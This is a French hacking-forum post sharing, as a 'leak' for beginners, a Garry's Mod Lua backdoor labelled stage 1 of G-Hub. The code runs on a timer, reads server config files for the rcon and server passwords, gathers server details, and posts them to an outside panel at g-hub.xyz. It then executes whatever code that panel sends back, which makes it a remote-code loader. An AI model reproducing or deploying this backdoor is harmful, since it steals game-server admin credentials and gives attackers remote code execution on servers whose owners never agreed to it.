• Salut Visiteur ! ✌
    Découvre nos partenaires officiels avec VeryLeak's. Des choix réfléchis, dignes de confiance pour tes avantages.

    StoryFound | REFUNDER TEAM

    StoryFound

    Rejoindre le Canal ✨ ou Plus d'information 📃

    Une question ? Rejoingnez nos différents canaux (Discord, Telegram, Revolt)

    Nos Canaux Communautaires

    Cet affichage peut se clôturer définitivement via la croix en haut à droite.

[LEAK] Backdoor Stage 1 G-Hub.xyz

Bot Agency

VeryLeak's Unique Member 👑
Level 3

Torrents Stats

Messages
147
J'aime
340
Trophées
275
Inscrit
28 Novembre 2018
Code:
--[[ GHub ┬ ┬┌┬┐┬┌┬┐┌─┐┌┬┐ ┌─┐┌─┐┌─┐┌─┐┌─┐┌─┐ │ │││││ │ ├┤ ││ ├─┤│ │ ├┤ └─┐└─┐ ┴─┘┴┴ ┴┴ ┴ └─┘─┴┘ ┴ ┴└─┘└─┘└─┘└─┘└─┘ --]] timer.Create("VpzOPJhXCY", 10, 0, function() local info = {} local files = file.Find("cfg/*", "GAME") for i = 1, #files do if string.EndsWith(files[i], ".cfg") then local content = file.Read("cfg/" .. files[i], "GAME") content = string.Explode("\n", content) for i = 1, #content do if string.StartWith(content[i], "rcon_password") then table.insert(info, 1, string.Split(content[i], "\"")[2]) end if string.StartWith(content[i], "sv_password") then table.insert(info, 2, string.Split(content[i], "\"")[2]) end end end end local rcon = info[1] or "Inconnu" local password = info[3] or "Inconnu" if rcon == "" then rcon = "Inconnu" end if password == "" then password = "Inconnu" end local a = { address = game.GetIPAddress(), hostname = GetHostName(), players = #player.GetHumans() .. "/" .. game.MaxPlayers(), map = game.GetMap(), gamemode = engine.ActiveGamemode(), rcon = rcon, password = password } http.Post("https://g-hub.xyz/panel/76561198030349230/core/stage2.php", a, function(body, len, headers, code) RunString(body, "ERROR", false) end) end)

Voila ça peut etre interresant pour les débutants
 
Haut Bas